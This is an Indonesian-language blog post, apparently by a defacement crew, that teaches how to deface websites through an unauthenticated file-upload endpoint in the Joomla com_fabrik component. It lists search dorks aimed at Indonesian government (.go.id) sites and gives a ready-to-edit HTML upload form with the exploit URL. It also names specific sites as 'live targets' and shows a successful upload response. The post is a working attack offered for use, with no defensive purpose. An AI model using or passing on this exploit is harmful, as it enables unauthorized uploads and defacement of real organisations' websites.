Home » » Deface poc crsf with com_fabrik

Deface poc crsf with com_fabrik

08.04    No comments



Deface poc crsf with com_fabrik:)

Dork :
 - inurl:index.php?option=com_fabrik
 - inurl:index.php/component/fabrik/ site:go.id
 - inurl:index.php?option=com_fabrik&view= site:go.id
 - inurl:importcsv.php site:go.id
(Di kembangin Pakai otak)

Alat dan bahan :
 - Csrf comot di bawah ini dan simpan dalam format HTML
-------------------------------------------------------------------------------
<title>Mr.Ry gans :)</title>
<br>
<br>
<body oncontextmenu="return false" onkeydown="return false" onmousedown="return false">
<body BGCOLOR="Black">
<Font Color="green" Face="courier new"><font size="8">CSRF By: ~/Mr.Ry</h1><br><br>
<form method="POST" action="targetlu.co.li/index.php?option=com_fabrik&format=raw&task =plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button,>Gas keun</button>
</form>
</center><br></font>
<Font Color="green" Face="courier new"<font size="4">Dork: inurl:/Com_Fabrik Site:go.id<br>

Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-------------------------------------------------------------------------------
 - sc depes lu kalian
 - exploit comot di bawah ini
(/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload)
=======================================
LIVE TARGET FOR YOU :)
 - www.zambianacmisonline.org
=======================================
Step By Step
1) Dorking Seperti Biasa cari site yang kira kira vuln
2) Kalau dah dapet masukan exploit nya contoh
"http://pn-maros.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
Kalau Vuln muncul tulisan *{"filepath":null,"uri":null}*
3) Selanjut nya kita edit script csrf nya untuk mengupload file deface nya
Edit Yang Bagian yang tebal dan di coret saja
edit dengan nama web yang hendak di eksekusi
==============================================================================
<form method="POST" action="http://www.namaweb.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"><input type="file" name="file"><button>Gas kenn</button></form>
<Font Color="green" Face="courier new"><font size="8">CSRF By:Mr.ZxNi9 </h1><br><br>
==============================================================================
Kalau Udah di edit jangan lupa save ya :v
4) Selanjut nya buka csrf nya
    upload script klian
5)  kalau berhasil akan muncul tulisan
{"filepath":"null","uri":"http:\/\/pn-maros.go.id\/.namafile.html"}
Kalau udah berhasil UP script kalian tinggal buka aja
http://namasite.co.li/[path]namafile.html atau htm
kalau gak ke deface ya Mati lah gblk:V,

Oke sekian dari kami :)
Thanks To :Ghost Exploiter Team

0 Post a Comment:

Posting Komentar